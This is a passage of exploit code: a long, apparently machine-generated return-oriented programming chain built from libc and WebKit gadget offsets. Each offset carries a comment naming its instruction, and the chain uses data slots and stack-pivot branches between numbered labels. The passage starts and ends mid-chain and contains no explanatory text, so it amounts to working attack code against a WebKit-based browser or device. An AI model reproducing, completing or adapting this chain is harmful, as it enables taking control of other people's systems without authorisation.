webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+220216, //L3832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3832:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3833:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3834:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+220408, //L3839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+220424, //L3840
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+220360, //L3836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3836:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3837:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3838:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3839:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3840:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+220536, //L3841+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+220528, //L3841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3841:
db([0, 0]); // 0x0
set_gadgets([
ropchain+220552, //L3841+24
ropchain+221504, //L3835
libc_base+764760, //pop rsi
ropchain+220592, //L3842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3842:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3844:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+220712, //L3847
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+220696, //L3845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3845:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3847:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+220856, //L3850
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+220824, //L3848
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+220840, //L3849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3848:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3849:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3850:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+220952, //L3852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3851:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3852:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3853:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+221056, //L3854
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+221072, //L3855
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3854:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3855:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+221248, //L3857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+221264, //L3858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+221232, //L3856
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3856:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3857:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3858:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+221408, //L3861
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+221424, //L3862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+221376, //L3859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3859:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3860:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3861:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3862:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+221496, //L3863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3863:
db([0, 0]); // 0x0
//L3835:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+221624, //L3866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+221640, //L3867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+221608, //L3865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3865:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3866:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3867:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+221752, //L3869
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+221800, //L3872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+221768, //L3870
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3869:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3870:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3871:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3872:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+221912, //L3873+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+221904, //L3873
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3873:
db([0, 0]); // 0x0
set_gadgets([
ropchain+221928, //L3873+24
ropchain+223952, //L3868
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+221968, //L3874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3874:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3875:
db([48, 0]); // 0x30
set_gadget(libc_base+144605,); //pop rdi
//L3876:
db([48, 0]); // 0x30
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+222160, //L3880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+222128, //L3878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+222144, //L3879
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3877:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L3878:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3879:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3880:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+222216, //L3882
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L3882:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+222344, //L3884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+222360, //L3885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+222328, //L3883
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3883:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3884:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3885:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+222456, //L3887
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+222440, //L3886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3886:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3887:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+222536, //L3888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3888:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3890:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+222656, //L3893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+222640, //L3891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3891:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3893:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+222800, //L3896
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+222768, //L3894
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+222784, //L3895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3894:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3895:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3896:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+222872, //L3898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3898:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+222928, //L3899
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3899:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+223008, //L3901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3901:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3903:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+223128, //L3906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+223112, //L3904
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3904:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3906:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+223272, //L3909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+223240, //L3907
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+223256, //L3908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3907:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3908:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3909:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+223360, //L3911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3910:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L3911:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+223416, //L3912
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3912:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3914:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+223496, //L3916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3916:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+223600, //L3917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+223616, //L3918
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3917:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3918:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+223704, //L3920
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3920:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+223760, //L3921
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3921:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+223832, //L3924
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3924:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+223888, //L3925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3925:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+223968, //L3927
//L3868:
libc_base+782311, //pop rsp
ropchain+223984, //L3928
//L3927:
libc_base+782311, //pop rsp
ropchain+219096, //L3806
//L3928:
//L3929:
libc_base+764760, //pop rsi
ropchain+224024, //L3930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3930:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3932:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+224144, //L3935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+224128, //L3933
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3933:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3935:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+224320, //L3938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+224336, //L3939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+224288, //L3936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+224304, //L3937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3936:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3937:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3938:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3939:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+224432, //L3941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+224416, //L3940
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3940:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3941:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3942:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L3943:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3944:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+224632, //L3946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3946:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+224688, //L3947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3947:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+224824, //L3951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+224808, //L3950
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3949:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3950:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3951:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+224928, //L3954
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+224960, //L3956
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3953:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3954:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3955:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3956:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+225072, //L3957+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+225064, //L3957
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3957:
db([0, 0]); // 0x0
set_gadgets([
ropchain+225088, //L3957+24
ropchain+226480, //L3952
libc_base+764760, //pop rsi
ropchain+225128, //L3958
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3958:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3960:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+225248, //L3963
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+225232, //L3961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3961:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3963:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+225392, //L3966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+225360, //L3964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+225376, //L3965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3964:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3965:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3966:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+225472, //L3967
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3967:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3969:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+225592, //L3972
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+225576, //L3970
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3970:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3972:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+225768, //L3975
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+225784, //L3976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+225736, //L3973
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+225752, //L3974
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3973:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3974:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3975:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3976:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+225944, //L3980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+225912, //L3978
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+225928, //L3979
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3977:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3978:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3979:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3980:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+226032, //L3981
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+226048, //L3982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3981:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3982:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+226224, //L3984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+226240, //L3985
webkit_base+660161, //mov [rsi], rax ; mov al, 1
